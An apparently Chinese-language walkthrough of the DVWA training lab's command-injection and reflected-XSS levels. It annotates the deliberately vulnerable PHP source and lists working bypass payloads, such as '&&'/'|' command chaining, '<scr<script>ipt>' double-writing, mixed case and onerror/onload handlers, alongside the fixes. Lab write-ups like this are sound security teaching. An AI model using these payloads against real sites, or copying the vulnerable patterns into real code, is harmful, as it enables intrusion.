1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

<?php

// 当表单提交按钮（Submit）被触发时执行以下代码
if (isset($_POST['Submit'])) {

    // 获取用户通过POST方式提交的IP地址数据
    // 注意：此处使用$_REQUEST可能会受到GET和POST两种方式的影响，为了安全性建议明确指定来源（如$_POST）
    $target = $_REQUEST['ip'];

    // 检查当前服务器的操作系统类型
    if (stristr(php_uname('s'), 'Windows NT')) {
        // 如果是Windows操作系统，则构建用于执行ping命令的字符串
        // 使用单引号包围命令并在末尾添加从用户输入获取的IP地址
        // 注意：这段代码存在命令注入风险，因为未对$user变量进行任何过滤或转义
        $cmd = shell_exec('ping ' . $target);
    } else {
        // 否则，认为是类*nix系统（Unix/Linux/Mac OS等）
        // 构建用于执行ping命令的字符串，'-c 4' 参数表示发送4个ICMP请求包
        // 同样，这段代码也存在命令注入风险
        $cmd = shell_exec('ping -c 4 ' . $target);
    }

    // 将执行命令的结果赋值给 $cmd 变量，并将其作为HTML预格式化的文本显示给用户
    // 这里展示了命令执行结果，但也暴露了潜在的安全风险
    $html .= "<pre>{$cmd}</pre>";
}

?>

1
2
3
4

192.168.90.127 && ipconfig
192.168.90.127 & ipconfig
0.0.0.0 || ipconfig
192.168.90.127 | ipconfig

1
2
3
4
5
6
7
8
9

// 对于Windows和*nix系统，都应先对用户输入进行转义
$target_sanitized = escapeshellarg($target);

// 然后构建命令
if (stristr(php_uname('s'), 'Windows NT')) {
    $cmd = shell_exec('ping ' . $target_sanitized);
} else {
    $cmd = shell_exec('ping -c 4 ' . $target_sanitized);
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

<?php

// 当检测到表单已提交（即点击了Submit按钮）时执行以下代码
if (isset($_POST['Submit'])) {

    // 获取用户通过POST方法提交的IP地址数据
    // 注意：这里使用$_REQUEST会同时接收GET和POST数据，若只期望POST数据，应使用$_POST['ip']
    $target = $_REQUEST['ip'];

    // 创建黑名单字符数组，其中包含了可能导致命令注入的特殊字符（在这里是逻辑运算符）
    $substitutions = array(
        '&&' => '', // 去除逻辑与符号，防止连续命令执行
        ';'  => '', // 去除分号，防止多条命令执行
    );

    // 使用str_replace函数替换掉用户输入中黑名单内的字符
    // 这是一个初级防护措施，但并不能完全阻止所有类型的命令注入攻击
    $target = str_replace(array_keys($substitutions), $substitutions, $target);

    // 检测当前服务器的操作系统类型
    if (stristr(php_uname('s'), 'Windows NT')) {
        // 如果是Windows操作系统，则执行ping命令
        $cmd = shell_exec('ping ' . $target);
    } else {
        // 否则，认为是类*nix系统（Unix/Linux/Mac OS等）
        // 执行带有-c参数的ping命令，表示向目标主机发送4个数据包
        $cmd = shell_exec('ping -c 4 ' . $target);
    }

    // 将ping命令的输出结果以HTML预格式化的文本形式呈现给用户
    // 虽然进行了部分字符过滤，但仍然需要注意此代码仍可能存在命令注入风险
    $html .= "<pre>{$cmd}</pre>";
}

?>

1
2
3

192.168.90.127 & ipconfig
0.0.0.0 || ipconfig
192.168.90.127 | ipconfig

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

<?php

// 当检测到表单已提交（Submit按钮已被点击）时执行以下代码
if (isset($_POST['Submit'])) {

    // 获取用户提交的IP地址输入，并使用trim函数去除首尾空白字符
    $target = trim($_REQUEST['ip']);

    // 定义一个黑名单字符数组，包含一些可能用于命令注入的特殊字符
    $substitutions = array(
        '&'   => '',     // 空字符替换"&"（逻辑与符号，用于连接多个命令）
        ';'   => '',     // 空字符替换";"（命令分隔符，用于执行多条命令）
        '| '  => '',     // 空字符替换"| "（管道符号，用于命令间通信）！！！我真的没看到这里居然有一个空格！！！
        '-'   => '',     // 空字符替换"-"（某些命令中的选项标志或组合命令）
        '$'   => '',     // 空字符替换"$"（环境变量引用或bash命令执行）
        '('   => '',     // 空字符替换"("（子shell执行或命令组）
        ')'   => '',     // 空字符替换")"（与"("配套使用）
        '`'   => '',     // 空字符替换"`"（命令替换）
        '||'  => '',     // 空字符替换"||"（逻辑或符号，用于命令执行失败时执行下一条命令）
    );

    // 使用str_replace函数，将用户输入中黑名单内所有字符替换为空字符
    // 这是一种针对命令注入的基本防御措施，但无法保证完全抵御所有攻击手法
    $target = str_replace(array_keys($substitutions), $substitutions, $target);

    // 判断当前操作系统类型
    if (stristr(php_uname('s'), 'Windows NT')) {
        // 若是Windows操作系统，则执行ping命令
        $cmd = shell_exec('ping ' . $target);
    } else {
        // 否则，认为是类*nix系统（Unix/Linux/Mac OS等）
        // 执行带有-c参数的ping命令，表示向目标主机发送4个数据包
        $cmd = shell_exec('ping -c 4 ' . $target);
    }

    // 将ping命令执行的原始输出反馈给用户，以HTML预格式化的文本形式展示
    // 尽管进行了字符过滤，但此代码依然存在命令注入的风险
    $html .= "<pre>{$cmd}</pre>";
}

?>

1

192.168.90.127 |ipconfig

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

<?php

// 当表单提交按钮（Submit）被触发时执行以下代码
if (isset($_POST['Submit'])) {

    // 验证Anti-CSRF令牌，防止跨站请求伪造攻击
    checkToken($_REQUEST['user_token'], $_SESSION['session_token'], 'index.php');

    // 获取用户输入的IP地址，并使用stripslashes函数去除反斜杠（\）以防止魔术引号攻击
    $target = $_REQUEST['ip'];
    $target = stripslashes($target);

    // 将IP地址拆分为四个八位字节（点分十进制形式）
    $octet = explode(".", $target);

    // 检查每个八位字节是否都是整数
    if (
        (is_numeric($octet[0])) &&
        (is_numeric($octet[1])) &&
        (is_numeric($octet[2])) &&
        (is_numeric($octet[3])) &&
        (sizeof($octet) == 4)
    ) {
        // 如果所有四个八位字节均为整数，则重新组合IP地址
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

        // 根据操作系统类型执行ping命令
        if (stristr(php_uname('s'), 'Windows NT')) {
            // 如果是Windows操作系统
            $cmd = shell_exec('ping ' . $target);
        } else {
            // 如果是*nix系统（如Unix/Linux/Mac OS）
            $cmd = shell_exec('ping -c 4 ' . $target);
        }

        // 将ping命令执行结果以HTML预格式化文本的形式返回给用户
        $html .= "<pre>{$cmd}</pre>";
    } else {
        // 用户输入的不是有效的IP地址，显示错误消息
        $html .= '<pre>ERROR: You have entered an invalid IP.</pre>';
    }
}

// 生成新的Anti-CSRF令牌并存储到session中
generateSessionToken();

?>

**注释说明：**

- 此PHP脚本主要处理用户提交的IP地址，并执行ping命令检查其连通性。
- 使用`checkToken`函数验证用户提交的Anti-CSRF令牌，确保请求来自合法用户而非第三方恶意伪造。
- 获取用户输入的IP地址，并通过`stripslashes`函数移除可能存在的反斜杠，以防止SQL注入或其他基于字符串逃逸的攻击。
- 将IP地址拆分成四个八位字节，然后逐一检查它们是否为数字，确保IP地址格式正确。
- 根据服务器操作系统类型执行相应的ping命令，并将结果显示给用户。
- 在脚本末尾调用`generateSessionToken`函数生成新的Anti-CSRF令牌，为后续请求提供保护。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

<?php

header ("X-XSS-Protection: 0");
//这行代码实际上禁用了浏览器内置的XSS防护机制。现代浏览器通常会有一个XSS过滤器，默认开启，用于检测并阻止某些类型的反射型XSS攻击。将此值设为0意味着告诉浏览器不要进行任何自动的XSS防护。

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Feedback for end user
	$html .= '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>
//对用户输入的数据没有进行任何过滤或转义处理

1
2
3
4

1、<script>alert(/XSS/)</script>

<script> 和 </script> 是HTML中的标签，用于定义JavaScript代码块的开始和结束。
alert() 是JavaScript的一个内置函数，用于显示带有一条消息的对话框。用户必须点击确定按钮才能关闭这个对话框并继续操作页面。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Get input
	$name = str_replace( '<script>', '', $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

?>
//str_replace() 函数以其他字符替换字符串中的一些字符（区分大小写）。本例中的作用为将'<script>'替换为''。

1
2
3
4
5
6

<scr<script>ipt>alert(/XSS/)</script>
//双写绕过
<ScrIpt>alert(/XSS/)</scRiPt>
//区分大小写
<script x>alert(/XSS/)</script y>
//绕过<script>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Get input
	$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
// preg_replace 是 PHP 中的一个函数，用于执行正则表达式的搜索和替换操作。
// 正则表达式：/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i
// /<...>/：定义了一个正则表达式的匹配模式，前后尖括号表示匹配任意字符直到遇到后面的字符。
// (.*)：点号.表示匹配任意单个字符（除了换行符），后面跟着的*表示前面的模式可以重复零次或多次。因此，(.*?)组合在一起表示匹配任意数量的任意字符，但这里的懒惰量词*?并没有使用，实际是贪婪匹配.*。
// s, c, r, i, p, t：分别匹配这些字母，中间的.和*允许任意字符出现在这些字母之间。
// /i：这是一个修饰符，表示执行不区分大小写的匹配。
    
	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

?>
// <script>标签被完全过滤

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

1、<img src=x onerror=alert(/XSS/)>

<img src=x onerror=alert(1)> 这段代码是一种典型的跨站脚本攻击（XSS）示例，利用了HTML图像标签（<img>）的onerror事件来触发JavaScript代码执行。其工作原理如下：

图像标签（<img>）：此标签用于在网页中嵌入图片。正常情况下，src属性会指向一个图像文件的URL。

src=x：这里的src属性被赋值为x，这是一个无效的图像URL。当浏览器尝试根据这个无效的URL加载图片时，自然找不到对应的资源，从而触发错误。

onerror事件：这是HTML元素的一个事件属性，当指定的错误情况发生时（如图像加载失败），会执行紧跟在其后的JavaScript代码。在这个例子中，就是alert(1)。

alert(1)：这是一个简单的JavaScript语句，用于弹出一个包含数字1的警告框。在实际的XSS攻击中，这可能被替换为更复杂的恶意代码，用于盗取用户Cookie、重定向用户到恶意站点、执行恶意脚本等。


2、<svg onload=alert(/XSS/)>

<svg onload=alert(/xss/)> 这段代码展示了另一种跨站脚本攻击（XSS）的载体，这次是利用SVG（可缩放矢量图形）元素的onload事件来触发JavaScript代码执行。其工作原理如下：

SVG元素：SVG是一种用于定义矢量图形的XML标记语言，可以直接嵌入到HTML文档中。与普通的HTML元素一样，SVG元素也支持事件处理器，如onload。

onload事件：在SVG中，onload事件会在SVG文档或者图像加载完成后触发。与HTML的<body onload="">类似，它提供了一个时机来执行指定的JavaScript代码。

alert(/xss/)：这里使用的JavaScript代码与之前的例子相似，目的是弹出一个警告框显示/xss/。但这里的/xss/实际上是正则表达式字面量，虽然作为alert函数的参数，它会被当作普通字符串显示，这不影响弹出警告框的效果，但表明攻击者可以嵌入更复杂的JavaScript逻辑，不仅仅是简单的字符串。

攻击原理：当这段SVG代码被嵌入到一个网页中，一旦SVG图形加载完成，onload事件就会触发，并执行alert(/xss/), 弹出一个包含/xss/的警告框。实质上，这揭示了网页对用户输入数据处理不当，允许执行恶意脚本的风险。攻击者可以利用这一点，不仅限于弹窗，还可以执行任何JavaScript代码，实现更深层次的攻击，如窃取用户数据、操控页面内容、发起进一步的攻击等。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    $html .= "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>